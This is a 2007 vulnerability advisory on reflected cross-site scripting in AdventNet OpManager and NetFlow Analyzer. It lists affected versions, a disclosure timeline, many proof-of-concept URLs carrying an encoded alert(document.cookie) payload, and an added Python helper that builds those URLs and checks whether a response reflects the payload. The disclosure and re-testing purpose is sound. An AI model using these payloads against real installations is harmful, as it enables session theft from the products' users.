###################################################
NetFlow Analyzer 5 & OpManager 7 multiple XSS
vendor url: http://www.adventnet.com/
advisory: http://lostmon.blogspot.com/2007/07/netflow-analizer-5-opmanager-7-multiple.html
vendor notified: yes
exploits included: yes
###################################################

NetFlow Analyzer and OpManager contain a flaw that allows remote cross-site scripting (XSS). The flaw exists because the applications do not validate or encode several request parameters before echoing them back into the HTML generated by several scripts. An attacker can craft a URL that, when opened by a user of the product, executes arbitrary script in that user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Every proof-of-concept URL below carries the same payload. Decoded, it first closes the attribute the parameter value is written into ("> ) and then injects a <script> block that calls alert(document.cookie), so a successful test pops the victim's session cookie. If a build encodes the value correctly, the same characters show up inside the attribute as &quot;&gt;&lt;body&gt;... and nothing executes; that is the check to run against a patched version.

#####################
Versions affected:
#####################
OpManager 7
OpManager 6
NetFlow Analyzer 5
Other versions may be vulnerable too.

###################
Solution:
###################
No solution was available at the time of writing.

##################
Time Line
##################
Discovered: 20-05-2007
Vendor notified: 02-07-2007
Vendor response: ----
Disclosure: 04-07-2007

###################
Examples
###################
Some of these flaws can only be triggered from an authenticated session, so log in to the product before opening the URLs. The payload is fully percent-encoded (every byte as %XX); the decoded value is identical in every URL, only the endpoint, the injected parameter and the fixed parameters around it change.
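Before the per-product URL lists, an added helper for working with them. This is example code written for this page, not part of the original advisory and not AdventNet code. It decodes and re-encodes the advisory's payload, rebuilds a proof-of-concept URL for any listed endpoint, reports which query parameter of a URL carries the probe, and classifies a server response as reflecting the probe raw (exploitable), HTML-escaped (neutralised) or not at all. The base URL http://localhost:8080 and the endpoint/parameter pairs are taken from the advisory; the two render_* functions are constructed stand-ins for a vulnerable and a fixed page, not real OpManager or NetFlow Analyzer output, so everything runs offline.

```python
"""Helpers for the reflected-XSS proof-of-concept URLs in this advisory.

Added example, not the advisory's or the vendor's code. The two render_*
functions at the bottom are constructed stand-ins for product pages.
"""
import html
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit

# Plain-text form of the probe the advisory injects: close the attribute the
# value lands in, then open a script block that reads the session cookie.
PAYLOAD = ('"><body><h1><p><a href="http://lostmon.blogspot.com">'
           'Lostmon Was Here !!!</h1></br>XSS PoW@ !!!!</p>'
           '<script>alert(document.cookie)</script></body>')

# The same probe as it appears in every URL of the advisory: every byte
# percent-encoded with upper-case hex.
ADVISORY_ENCODED = (
    "%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22"
    "%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E"
    "%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21"
    "%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21"
    "%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65"
    "%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64"
    "%79%3E")


def encode_all(text):
    """Percent-encode every byte with upper-case hex, as the advisory does."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


def decode_payload(encoded):
    """Percent-decode a payload the way the server and browser will see it."""
    return unquote(encoded)


def build_poc_url(base, path, param, benign, extra=None, payload=PAYLOAD):
    """Rebuild one of the advisory's PoC URLs: the benign value the page
    expects, immediately followed by the encoded payload, then any fixed
    parameters the page needs in order to render at all."""
    query = "%s=%s%s" % (param, benign, encode_all(payload))
    if extra:
        query += "&" + urlencode(extra)
    return base.rstrip("/") + path + "?" + query


def injected_params(url):
    """Names of the query parameters whose decoded value carries the probe."""
    query = urlsplit(url).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if "<script>" in v]


def classify_reflection(body, payload=PAYLOAD):
    """What did the page do with the probe? Only a raw reflection is
    exploitable; an escaped one still shows the parameter reaches the page,
    which is worth recording when re-testing a patched build."""
    if "<script>alert(document.cookie)</script>" in body:
        return "reflected-raw"
    if html.escape(payload, quote=True) in body:
        return "reflected-escaped"
    return "not-reflected"


# Constructed stand-in (not product output): a page that writes the
# parameter verbatim into an attribute, which is the bug described above.
def render_unvalidated(value):
    return '<input type="text" name="name" value="%s">' % value


# Constructed stand-in: the same page once the value is escaped for an
# attribute context, so the probe stays inside the quotes.
def render_escaped(value):
    return ('<input type="text" name="name" value="%s">'
            % html.escape(value, quote=True))


if __name__ == "__main__":
    print(decode_payload(ADVISORY_ENCODED))
    url = build_poc_url("http://localhost:8080", "/map/ping.do",
                        "name", "192.168.1.2")
    print(url)
    print("injected parameter(s):", injected_params(url))
    for page in (render_unvalidated, render_escaped):
        body = page("192.168.1.2" + PAYLOAD)
        print(page.__name__, "->", classify_reflection(body))
```

To test a live instance, fetch each rebuilt URL with the session cookie of a logged-in user and pass the response body to classify_reflection; a "reflected-raw" result on any endpoint reproduces the finding, a "reflected-escaped" result on the same endpoint after an update is the evidence that the fix landed.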
#####################
OpManager
#####################

http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/devices/Search.do?searchTerm=sss%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selectedTab=Map

http://localhost:8080/reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_Memory_Utilization&reportName=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&displayName=webclient.reports.servers.memutil

http://localhost:8080/reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_Memory_Utilization&reportName=Utilization_Report&displayName=webclient.reports.servers.memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&reportName=Utilization_Report&displayName=webclient.reports.servers.cpuutil

http://localhost:8080/admin/ServiceConfiguration.do?operation=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerter&serviceName=Alerter

http://localhost:8080/admin/DeviceAssociation.do?selectedNode=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&className=com.adventnet.me.opmanager.webclient.admin.association.NTServiceAssociation

http://localhost:8080/admin/DeviceAssociation.do?selectedTab=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConfigurations

http://localhost:8080/admin/DeviceAssociation.do?selectedTab=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

#######################
NetFlow Analyzer
#######################

http://localhost:8080/netflow/jspui/applicationList.jsp?alpha=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modify%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&appID=62

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=groups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=global%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/customReport.jsp?rtype=global%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&period=hourly&customOption=true&firstTime=true

####################
€nd
################################

Thanks to estrella for being my light.
Thanks to all the Lostmon Team !!!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....